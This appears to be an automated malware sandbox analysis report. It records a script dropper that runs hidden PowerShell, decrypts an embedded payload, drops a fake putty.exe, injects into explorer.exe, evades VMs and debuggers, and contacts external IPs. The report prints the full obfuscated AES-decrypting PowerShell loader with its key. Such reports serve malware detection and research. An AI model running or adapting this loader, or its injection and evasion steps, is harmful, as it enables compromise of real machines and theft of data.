                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\AppData\Roaming\putty.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\putty.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\putty.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\putty.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\putty.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\putty.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\edrecibKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\edrecibKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\edrecibKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\edrecibKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\edrecibKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\edrecibKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\putty.exeAPI/Special instruction interceptor: Address: 7FFBCB7AE814
                Source: C:\Users\user\AppData\Roaming\putty.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD584
                Source: C:\Users\user\AppData\Roaming\edrecibAPI/Special instruction interceptor: Address: 7FFBCB7AE814
                Source: C:\Users\user\AppData\Roaming\edrecibAPI/Special instruction interceptor: Address: 7FFBCB7AD584
                Source: putty.exe, 00000004.00000002.1639126728.000000000081E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOK
                Source: edrecib, 00000007.00000002.1858756322.00000000006FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOKHE
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4015Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5845Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 439Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 2800Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 838Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 372Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1900Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 882Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 870Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 908Thread sleep time: -10145709240540247s >= -30000sJump to behavior
                Source: C:\Windows\explorer.exe TID: 6336Thread sleep count: 439 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 6632Thread sleep count: 2800 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 6632Thread sleep time: -280000s >= -30000sJump to behavior
                Source: C:\Windows\explorer.exe TID: 5232Thread sleep count: 838 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 5232Thread sleep time: -83800s >= -30000sJump to behavior
                Source: C:\Windows\explorer.exe TID: 5904Thread sleep count: 295 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 5092Thread sleep count: 372 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 5092Thread sleep time: -37200s >= -30000sJump to behavior
                Source: C:\Windows\explorer.exe TID: 5868Thread sleep count: 347 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 5868Thread sleep time: -34700s >= -30000sJump to behavior
                Source: C:\Windows\explorer.exe TID: 6632Thread sleep count: 1900 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 6632Thread sleep time: -190000s >= -30000sJump to behavior
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: explorer.exe, 00000005.00000000.1622386973.00000000090DA000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWystem32\DriverStore\en\volume.inf_loc
                Source: explorer.exe, 00000005.00000000.1619262177.0000000000A28000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                Source: explorer.exe, 00000005.00000000.1622386973.0000000009290000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTcaVMWare
                Source: explorer.exe, 00000005.00000000.1622386973.0000000009330000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}F
                Source: wscript.exe, 00000000.00000003.1590084250.000002AC9038D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: powershell.exe, 00000002.00000002.1586222462.0000022BF6DF3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: powershell.exe, 00000002.00000002.1586222462.0000022BF6DF3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}
                Source: explorer.exe, 00000005.00000000.1619262177.0000000000A28000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00=
                Source: explorer.exe, 00000005.00000000.1622386973.0000000009255000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: explorer.exe, 00000005.00000000.1622386973.00000000091FB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
                Source: powershell.exe, 00000002.00000002.1585756370.0000022BF6D40000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1622386973.00000000090DA000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: explorer.exe, 00000005.00000000.1619262177.0000000000A28000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                Source: explorer.exe, 00000005.00000000.1622386973.0000000009330000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                Source: explorer.exe, 00000005.00000000.1622386973.0000000009290000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
                Source: explorer.exe, 00000005.00000000.1619262177.0000000000A28000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: C:\Users\user\AppData\Roaming\putty.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Source: C:\Users\user\AppData\Roaming\putty.exeSystem information queried: CodeIntegrityInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\edrecibSystem information queried: CodeIntegrityInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\putty.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\AppData\Roaming\edrecibProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 4_2_0054159D push dword ptr fs:[00000030h]4_2_0054159D
                Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 4_2_005F092B mov eax, dword ptr fs:[00000030h]4_2_005F092B
                Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 4_2_005F0D90 mov eax, dword ptr fs:[00000030h]4_2_005F0D90
                Source: C:\Users\user\AppData\Roaming\edrecibCode function: 7_2_0054159D push dword ptr fs:[00000030h]7_2_0054159D
                Source: C:\Users\user\AppData\Roaming\edrecibCode function: 7_2_005B092B mov eax, dword ptr fs:[00000030h]7_2_005B092B
                Source: C:\Users\user\AppData\Roaming\edrecibCode function: 7_2_005B0D90 mov eax, dword ptr fs:[00000030h]7_2_005B0D90

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Windows\explorer.exeFile created: edrecib.5.drJump to dropped file
                Source: C:\Windows\explorer.exeNetwork Connect: 109.70.26.37 80Jump to behavior
                Source: C:\Windows\explorer.exeNetwork Connect: 94.156.177.51 80Jump to behavior
                Source: C:\Users\user\AppData\Roaming\putty.exeThread created: C:\Windows\explorer.exe EIP: 8521998Jump to behavior
                Source: C:\Users\user\AppData\Roaming\edrecibThread created: unknown EIP: 7F61998Jump to behavior
                Source: C:\Users\user\AppData\Roaming\putty.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
                Source: C:\Users\user\AppData\Roaming\putty.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                Source: C:\Users\user\AppData\Roaming\edrecibSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
                Source: C:\Users\user\AppData\Roaming\edrecibSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function kzVl($BRaA){return -split ($BRaA -replace '..', '0x$& ')};$Qiyjc = kzVl('583A9978E4D34538992E1A1351EF94C76F346575AEA09EB513401549161877EAF16C217FA53FAF8E9F5A6B6C98F436132CD64686F84B385701DF5CB57A496A57D083A739BD167A16F22386779010D0352280C205381DB165BF369C1DDC1AB0B20826DFB010CFDDCDFA3710E79E1F0DF5396A3CDCB1519A0E59214CB85DD8D5DB3598F5C3CC2D2307A104A5856E89829E0A80D0286C7C00A59C9857283FBDB29EB8E496DD4C09DA9F275960328E5AC89D55EBD3DCFED16A96B6882267D9DCBB1521E1A44EEC3CE3DA70C185B6D12547011407D8226CD2AE3CE2F55821F81B446119C95B163DB7DC61D936658509E877C1C06861FB6361BE198E404AE7F361887E373DC1A99E729EA6BCAD34C16C098676CBD7B34C34B4F6155017983594876DAC6BDB2C587F4A232BC97779B63E1A9088C50429F113E053CF31D6547C6D7F0ABE12F1F0B6A3F596803EBE69B5D5A6D1179C28BCAA989E167C59B3FF802844CBD654C0D6740476BF8F45699EB7ADB664C116B89504C4839F998A91C64E5E71E61B29061402831AAC2A34042CD38B595CF64B56303C0B9F31CEFD6C1F6AFD8BEDDEA69D470D2A173FC1496F22674C3559B74CED02F1DCEC4DABB38BA293DA8F762959B7DDA301EEA24D6B450354B04288F6385A2B2EDB10FA89F0D27FF2907D00A53F937FD89AB58F6811A166D5A633234208A16F44C7E1FDA1CA5781750D0FD0698B225A66882E2BC56217A52CCBF79E80ED2ABC2CDC8039511450AF5B112EADDA510CE1EED99D3EBFDAD959AB50B58880B9E56EC313C6B087C011B3DA810C2A5E3C6A90C69061B7B3ECED35C713C11874F6763FA79F0691D4FF8B99159BF1A716F811E9CBB8F818216B8AEF751BF044FBFE9DAA0CB892645C05F5D407EFED774BA5689A68FE5547020C0FE72F39D5ACA4');$mZBMz=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((kzVl('72786673574B4C516874716D49544E50')),[byte[]]::new(16)).TransformFinalBlock($Qiyjc,0,$Qiyjc.Length)); & $mZBMz.Substring(0,3) $mZBMz.Substring(3)Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\putty.exe "C:\Users\user\AppData\Roaming\putty.exe" Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop function kzvl($braa){return -split ($braa -replace '..', '0x$& ')};$qiyjc = kzvl('583a9978e4d34538992e1a1351ef94c76f346575aea09eb513401549161877eaf16c217fa53faf8e9f5a6b6c98f436132cd64686f84b385701df5cb57a496a57d083a739bd167a16f22386779010d0352280c205381db165bf369c1ddc1ab0b20826dfb010cfddcdfa3710e79e1f0df5396a3cdcb1519a0e59214cb85dd8d5db3598f5c3cc2d2307a104a5856e89829e0a80d0286c7c00a59c9857283fbdb29eb8e496dd4c09da9f275960328e5ac89d55ebd3dcfed16a96b6882267d9dcbb1521e1a44eec3ce3da70c185b6d12547011407d8226cd2ae3ce2f55821f81b446119c95b163db7dc61d936658509e877c1c06861fb6361be198e404ae7f361887e373dc1a99e729ea6bcad34c16c098676cbd7b34c34b4f6155017983594876dac6bdb2c587f4a232bc97779b63e1a9088c50429f113e053cf31d6547c6d7f0abe12f1f0b6a3f596803ebe69b5d5a6d1179c28bcaa989e167c59b3ff802844cbd654c0d6740476bf8f45699eb7adb664c116b89504c4839f998a91c64e5e71e61b29061402831aac2a34042cd38b595cf64b56303c0b9f31cefd6c1f6afd8beddea69d470d2a173fc1496f22674c3559b74ced02f1dcec4dabb38ba293da8f762959b7dda301eea24d6b450354b04288f6385a2b2edb10fa89f0d27ff2907d00a53f937fd89ab58f6811a166d5a633234208a16f44c7e1fda1ca5781750d0fd0698b225a66882e2bc56217a52ccbf79e80ed2abc2cdc8039511450af5b112eadda510ce1eed99d3ebfdad959ab50b58880b9e56ec313c6b087c011b3da810c2a5e3c6a90c69061b7b3eced35c713c11874f6763fa79f0691d4ff8b99159bf1a716f811e9cbb8f818216b8aef751bf044fbfe9daa0cb892645c05f5d407efed774ba5689a68fe5547020c0fe72f39d5aca4');$mzbmz=-join [char[]](([security.cryptography.aes]::create()).createdecryptor((kzvl('72786673574b4c516874716d49544e50')),[byte[]]::new(16)).transformfinalblock($qiyjc,0,$qiyjc.length)); & $mzbmz.substring(0,3) $mzbmz.substring(3)
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop function kzvl($braa){return -split ($braa -replace '..', '0x$& ')};$qiyjc = kzvl('583a9978e4d34538992e1a1351ef94c76f346575aea09eb513401549161877eaf16c217fa53faf8e9f5a6b6c98f436132cd64686f84b385701df5cb57a496a57d083a739bd167a16f22386779010d0352280c205381db165bf369c1ddc1ab0b20826dfb010cfddcdfa3710e79e1f0df5396a3cdcb1519a0e59214cb85dd8d5db3598f5c3cc2d2307a104a5856e89829e0a80d0286c7c00a59c9857283fbdb29eb8e496dd4c09da9f275960328e5ac89d55ebd3dcfed16a96b6882267d9dcbb1521e1a44eec3ce3da70c185b6d12547011407d8226cd2ae3ce2f55821f81b446119c95b163db7dc61d936658509e877c1c06861fb6361be198e404ae7f361887e373dc1a99e729ea6bcad34c16c098676cbd7b34c34b4f6155017983594876dac6bdb2c587f4a232bc97779b63e1a9088c50429f113e053cf31d6547c6d7f0abe12f1f0b6a3f596803ebe69b5d5a6d1179c28bcaa989e167c59b3ff802844cbd654c0d6740476bf8f45699eb7adb664c116b89504c4839f998a91c64e5e71e61b29061402831aac2a34042cd38b595cf64b56303c0b9f31cefd6c1f6afd8beddea69d470d2a173fc1496f22674c3559b74ced02f1dcec4dabb38ba293da8f762959b7dda301eea24d6b450354b04288f6385a2b2edb10fa89f0d27ff2907d00a53f937fd89ab58f6811a166d5a633234208a16f44c7e1fda1ca5781750d0fd0698b225a66882e2bc56217a52ccbf79e80ed2abc2cdc8039511450af5b112eadda510ce1eed99d3ebfdad959ab50b58880b9e56ec313c6b087c011b3da810c2a5e3c6a90c69061b7b3eced35c713c11874f6763fa79f0691d4ff8b99159bf1a716f811e9cbb8f818216b8aef751bf044fbfe9daa0cb892645c05f5d407efed774ba5689a68fe5547020c0fe72f39d5aca4');$mzbmz=-join [char[]](([security.cryptography.aes]::create()).createdecryptor((kzvl('72786673574b4c516874716d49544e50')),[byte[]]::new(16)).transformfinalblock($qiyjc,0,$qiyjc.length)); & $mzbmz.substring(0,3) $mzbmz.substring(3)Jump to behavior
                Source: explorer.exe, 00000005.00000000.1619596278.0000000001090000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.1622386973.000000000936E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1620621433.00000000044D0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: explorer.exe, 00000005.00000000.1619262177.0000000000A28000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1619596278.0000000001090000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: explorer.exe, 00000005.00000000.1619596278.0000000001090000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: 0Program Manager
                Source: explorer.exe, 00000005.00000000.1619596278.0000000001090000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: explorer.exe, 00000005.00000000.1622386973.000000000936E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd]1Q
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 4.2.putty.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.3.edrecib.5c0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.3.putty.exe.600000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.edrecib.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.putty.exe.5f0e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.edrecib.5b0e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.1638027397.0000000000731000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1858830240.0000000000981000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1636745792.0000000000600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
